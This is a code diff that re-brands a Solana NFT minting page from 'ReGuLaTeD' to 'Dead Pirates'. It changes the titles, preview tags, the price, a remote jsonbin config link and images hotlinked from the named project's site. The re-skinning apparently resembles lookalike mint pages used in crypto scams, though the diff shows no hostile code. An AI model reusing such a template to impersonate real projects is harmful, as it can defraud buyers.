--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 https://mint.regulatednft.io" property="og:title">
+    <meta content="🌐 https://deadpirates.io/mint-app" property="og:title">
     <meta content="
-     🟢 ReGuLaTeD Private Minting is NOW LIVE!
+     🟢 Dead Pirates Minting is NOW LIVE!
     
-     Mint Price: 2.5 SOL
+     Mint Price: 1.25 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1509686786083147779/1650310205/1500x500" property="og:image">
+    <meta content="https://www.deadpirates.io/static/media/1232.6dee4049b2090364b902.png" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/113" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/117" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Regulated NFT Collection</title>
-    <link rel="shortcut icon" href="https://www.regulatednft.io/logo.png" />
+    <title>Dead Pirates</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1523150392539836417/Jhz9Tspd_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -66,12 +66,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">ReGuLaTeD (aka f*ck regulation)</h2>
+                <h2 class="right-title">Dead Pirates</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            Animated series, Staking & RegulatedCast 🎙 coming soon to #Solana.
+                            5555 Dead Pirates setting sail on the #solana blockchain soon...
                     </li>
                     </div>
 
@@ -82,7 +82,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>2.5</span> SOL</div>
+                            <div id="price-total"><span>1.25</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -103,7 +103,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://www.regulatednft.io/team/Dev%202.png" alt="GiF">
+                        <img class="animation" src="https://www.deadpirates.io/static/media/prodigy.35de99ca2bb856544217.png" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -119,7 +119,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 2.5;
+        let itemPriceSelected = 1.25;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
